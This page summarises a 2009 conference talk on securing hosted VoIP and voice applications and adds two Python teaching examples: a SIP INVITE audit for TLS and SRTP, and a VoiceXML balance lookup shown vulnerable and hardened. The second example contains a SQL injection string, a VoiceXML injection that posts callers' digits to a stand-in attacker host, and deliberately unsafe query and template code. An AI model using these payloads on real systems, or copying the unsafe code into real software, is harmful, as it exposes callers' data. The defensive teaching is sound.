SpeechTEK 2009: Securing Cloud Telephony Aug2009


In this talk at SpeechTEK 2009 in New York City, Dan York discussed:

As voice and self-service applications move increasingly into the cloud and to IP communications, what do you need to be concerned about with regard to the security of hosted solutions? If you grow to trust the cloud, how can you be sure it will be there for you? What protections can you put in place? What backup plans can you establish? What questions should you ask potential hosted/cloud vendors? In this session, security professional Dan York will walk you through the basic risk areas of voice-over-IP security, explain how those relate to both hosted and hybrid configurations, and leave you with a concrete list of questions to ask when considering hosted/cloud options.



  1. SpeechTEK 2009: Securing Cloud Telephony. Dan York, CISSP, Director of Conversations, Voxeo; Best Practices Chair, VoIP Security Alliance (VOIPSA); dyork@voxeo.com
  2. Security concerns in telephony are not new... (Image courtesy of the Computer History Museum)
  3. Nor are our attempts to protect against threats... (Image courtesy of Mike Sandman, http://www.sandman.com/)
  4. Privacy, Availability, Compliance, Confidence, Mobility, Cost Avoidance, Business Continuity
  5. TDM security is relatively simple... [Diagram: PSTN gateways, TDM switch, IVR, voicemail, physical wiring]
  6. VoIP security is more complex. [Diagram: operating systems, desktop PCs, PSTN gateways, e-mail systems, network switches, web servers, firewalls, standards, voice over IP devices, IVR, wireless, instant messaging, directories, Internet, databases, voicemail, physical wiring]
  7. Confidentiality, Integrity, Availability
  8. Voice Application Diagram. [Diagram: Phone -> Voice Browser (on server) -> HTTP -> Web Server -> App/DB Server; audio source marked "?"; the voice browser is driven by VoiceXML or CCXML, the web tier written in PHP, Perl, Python, Ruby, Java servlets, XML, or "???"]
  9. Voice Transport (slide 8 diagram)
  10. Voice Transport. [Diagram, five paths from the phone to the voice browser on the server: Phone -> PSTN -> Voice Browser; Phone -> PSTN -> PBX -> TDM -> Voice Browser; Phone -> PSTN -> IP-PBX -> SIP -> Voice Browser; Phone -> PSTN -> SIP Service Provider -> Internet/WAN -> SIP -> Voice Browser; Phone -> Internet/WAN -> SIP -> Voice Browser]
  11. Voice Transport - SIP (same five paths as slide 10)
  12. Voice Authentication (slide 8 diagram). Who are you talking to?
  13. Voice Biometrics (slide 8 diagram with a Voice Biometrics Auth Server added)
  14. Web Transport (slide 8 diagram)
  15. App/DB Server Transport (slide 8 diagram)
  16. Server Security (slide 8 diagram)
  17. Management Interfaces (slide 8 diagram)
  18. APIs (slide 8 diagram)
  19. Local Storage / Logging (slide 8 diagram)
  20. Call Recording (slide 8 diagram)
  21. Web Interaction - Authentication (slide 8 diagram, Web Server)
  22. Web Interaction - XSS/Injection (slide 8 diagram, Web Server). Input validation?
  23. External Interaction (slide 8 diagram with an external App/DB Server added, marked "?")
  24. Moving Into The Cloud
  25. Location - Single network/server (slide 8 diagram)
  26. Location - Distributed (two copies of the slide 8 stack)
  27. Location - Distributed (slide 8 diagram)
  28. Location - Into the cloud (slide 8 diagram)
  29. Location - Distributed/Cloud (two copies of the slide 8 stack)
  30. Location - Distributed/Cloud (slide 8 diagram)
  31. Location - Hybrid (slide 8 stack alongside a second stack of Web Server and App/DB Server without the phone and voice browser)
  32. Can You Trust The Cloud To Be There?
  33. Location/network questions
     • What level of network connectivity do you have available?
     • What kind of availability guarantees / Service Level Agreements (SLAs) do you have in place?
     • What kind of geographic redundancy is built into your underlying network?
     • What kind of network redundancy is built into your underlying network?
     • What kind of physical redundancy is built into your data centers?
     • What kind of monitoring do you perform?
     • What kind of scalability is in the cloud computing platform?
     • What kind of security, both network and physical, is part of the platform?
     • What kind of security policies and procedures are in place?
     • What kind of patch management plans?
     • Will firewall traversal be necessary (for instance, for a SIP trunk) and if so, how?
     • How scalable is the solution?
     • Do you have appropriately-trained and available staff?
  34. Distributed Architectures. [Diagram: Phone and audio -> Voice Browser (on server) -> Web Server -> App/DB Server, with a second Web Server / App/DB Server pair; a second Voice Browser (on server) -> App/DB Server; MRCP link to an ASR engine]
  35. Geography
  36. Confidentiality, Integrity, Availability
  37. Thank you! Dan York, CISSP, Director of Conversations, Voxeo; Best Practices Chair, VoIP Security Alliance (VOIPSA); dyork@voxeo.com
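Slides 10 and 11 end with the two paths where SIP signaling and the audio itself cross the Internet/WAN, and slides 7 and 36 frame the talk around confidentiality, integrity and availability. The check below, an added example that is not from the slides or from any Voxeo or VOIPSA tool, reads a SIP INVITE as it would arrive on that leg and reports whether the hop protected the signaling (SIP over TLS) and the media (SRTP, RTP/SAVP). Both messages are constructed, the addresses are documentation ranges and the SRTP key in the a=crypto line is a placeholder; the parser covers only what this audit needs (top Via, m= lines, a=crypto) and assumes SDES keying, not DTLS-SRTP.

```python
"""Audit a SIP INVITE for confidentiality on the Internet/WAN leg.

Added example, not from the slides or any VOIPSA tool. Messages are
constructed; addresses are documentation ranges, the SRTP key is a placeholder.
"""

# Constructed: INVITE from a SIP trunk over plain UDP, offering cleartext RTP.
PLAIN_INVITE = "\r\n".join([
    "INVITE sip:ivr@voiceapp.example SIP/2.0",
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds",
    "From: <sip:caller@provider.example>;tag=1928301774",
    "To: <sip:ivr@voiceapp.example>",
    "Call-ID: a84b4c76e66710@192.0.2.10",
    "CSeq: 314159 INVITE",
    "Content-Type: application/sdp",
    "",
    "v=0",
    "o=- 2890844526 2890844526 IN IP4 192.0.2.10",
    "s=-",
    "c=IN IP4 192.0.2.10",
    "t=0 0",
    "m=audio 49170 RTP/AVP 0 8",
    "a=rtpmap:0 PCMU/8000",
])

# Constructed: the same call over TLS, offering SRTP keyed with SDES (a=crypto).
# The inline key is a placeholder of the right length, not real key material.
SECURE_INVITE = "\r\n".join([
    "INVITE sip:ivr@voiceapp.example SIP/2.0",
    "Via: SIP/2.0/TLS 192.0.2.10:5061;branch=z9hG4bK776asdhds",
    "From: <sip:caller@provider.example>;tag=1928301774",
    "To: <sip:ivr@voiceapp.example>",
    "Call-ID: a84b4c76e66710@192.0.2.10",
    "CSeq: 314159 INVITE",
    "Content-Type: application/sdp",
    "",
    "v=0",
    "o=- 2890844526 2890844526 IN IP4 192.0.2.10",
    "s=-",
    "c=IN IP4 192.0.2.10",
    "t=0 0",
    "m=audio 49170 RTP/SAVP 0 8",
    "a=rtpmap:0 PCMU/8000",
    "a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|2^20|1:32",
])


def parse_sip(raw):
    """Split a SIP message into (request line, header dict, body).
    Header names are lower-cased; repeated headers (several Via) keep order."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def audit_invite(raw):
    """Return the signaling transport, the media profiles offered and a list
    of findings. No findings means TLS signaling and SRTP media on this hop."""
    _, headers, sdp = parse_sip(raw)
    findings = []

    # The top-most Via names the hop that delivered the message; its transport
    # token (UDP, TCP, TLS) says whether headers and SDP crossed the wire in clear.
    via = headers.get("via", [""])[0]
    transport = via.split()[0].rsplit("/", 1)[-1].upper() if via else "UNKNOWN"
    if transport != "TLS":
        findings.append(f"signaling over {transport}: caller ID, called number "
                        "and SDP readable in transit")

    sdp_lines = sdp.splitlines()
    profiles = [l.split()[2] for l in sdp_lines if l.startswith("m=")]
    has_sdes_key = any(l.startswith("a=crypto:") for l in sdp_lines)
    for profile in profiles:
        # Only SDES-keyed SRTP profiles are recognised here; DTLS-SRTP
        # (UDP/TLS/RTP/SAVP with a=fingerprint) would need its own check.
        if profile not in ("RTP/SAVP", "RTP/SAVPF"):
            findings.append(f"media offered as {profile}: audio and DTMF unencrypted")
        elif not has_sdes_key:
            findings.append(f"{profile} offered without a=crypto: no key material")
    # SDES keys ride inside the SDP, so SRTP is only as private as the signaling.
    if has_sdes_key and transport != "TLS":
        findings.append("a=crypto SRTP key sent over cleartext signaling")

    return {"transport": transport, "profiles": profiles, "findings": findings}


if __name__ == "__main__":
    for name, msg in (("plain", PLAIN_INVITE), ("secure", SECURE_INVITE)):
        print(name, audit_invite(msg))
```

The result only speaks for the hop it inspects: a hosted provider terminates TLS at its edge, so the vendor questions on slide 33 (and "how will SIP traverse the firewall?") are where the rest of the path gets answered.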
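Slide 22 puts "Input validation?" next to the web server that, per slide 8, generates VoiceXML from PHP, Perl, Python or Ruby. The point a voice developer tends to miss is that the keypad is not the trust boundary: the web tier receives an HTTP parameter from the voice browser (or an ASR result), and anyone who can reach that URL can set it to anything. The following is an added example, not code from the slides or from Voxeo: a hypothetical balance lookup shown once with string-built SQL and unescaped VoiceXML, and once validated, bound and escaped. The account table, the field name and the attack strings are all constructed for the demo.

```python
"""Dynamic VoiceXML generation from caller input: vulnerable and hardened.

Added example, not code from the slides or from Voxeo. The account table,
the DTMF field and the VoiceXML prompt are assumptions made for the demo.
"""
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def make_db():
    """Constructed sample data: two fake accounts in an in-memory SQLite DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT PRIMARY KEY, balance REAL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("1001", 25.50), ("1002", 9000.00)])
    return conn


def lookup_vulnerable(conn, acct):
    """Trusts the 'acct' field as it arrived in the voice browser's HTTP
    request and splices it into SQL. A DTMF keypad cannot type a quote, but
    the web tier never sees the keypad, only an HTTP parameter."""
    sql = f"SELECT acct, balance FROM accounts WHERE acct = '{acct}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, acct):
    """Validate against what the dialog actually allows (four DTMF digits)
    and bind the value instead of concatenating it."""
    if not (acct.isdigit() and len(acct) == 4):
        return []
    return conn.execute(
        "SELECT acct, balance FROM accounts WHERE acct = ?", (acct,)
    ).fetchall()


def vxml_vulnerable(acct, balance):
    """Echoes caller input straight into the VoiceXML the browser will execute."""
    return (
        '<?xml version="1.0"?>\n'
        '<vxml version="2.1"><form><block>\n'
        f'<prompt>Account {acct} has a balance of {balance} dollars.</prompt>\n'
        '</block></form></vxml>'
    )


def vxml_hardened(acct, balance):
    """Same document, but caller-derived text is XML-escaped so it can only
    ever be prompt text, never new VoiceXML elements."""
    return (
        '<?xml version="1.0"?>\n'
        '<vxml version="2.1"><form><block>\n'
        f'<prompt>Account {escape(acct)} has a balance of {balance:.2f} dollars.</prompt>\n'
        '</block></form></vxml>'
    )


def contains_injected_element(vxml_doc, tag):
    """True if the generated document parses and contains an element the
    application never meant to emit (here a <submit> that would send the
    call's collected data to another URL)."""
    try:
        root = ET.fromstring(vxml_doc)
    except ET.ParseError:
        return False
    return root.find(f".//{tag}") is not None


# Constructed attack inputs: one for the SQL layer, one for the VoiceXML layer.
SQL_PAYLOAD = "' OR '1'='1"
VXML_PAYLOAD = '</prompt><submit next="http://attacker.invalid/collect"/><prompt>'

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", lookup_vulnerable(db, SQL_PAYLOAD))
    print("hardened lookup:  ", lookup_hardened(db, SQL_PAYLOAD))
    print("vulnerable vxml injects <submit>:",
          contains_injected_element(vxml_vulnerable(VXML_PAYLOAD, 0.0), "submit"))
    print("hardened vxml injects <submit>:  ",
          contains_injected_element(vxml_hardened(VXML_PAYLOAD, 0.0), "submit"))
```

The second payload is the voice-channel equivalent of XSS: an injected `<submit>` makes the voice browser post the caller's collected digits elsewhere, with nothing on the phone line to tip the caller off. Validating to the dialog's grammar (digits only) removes both issues at once; escaping is the backstop for any value that still has to be echoed.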
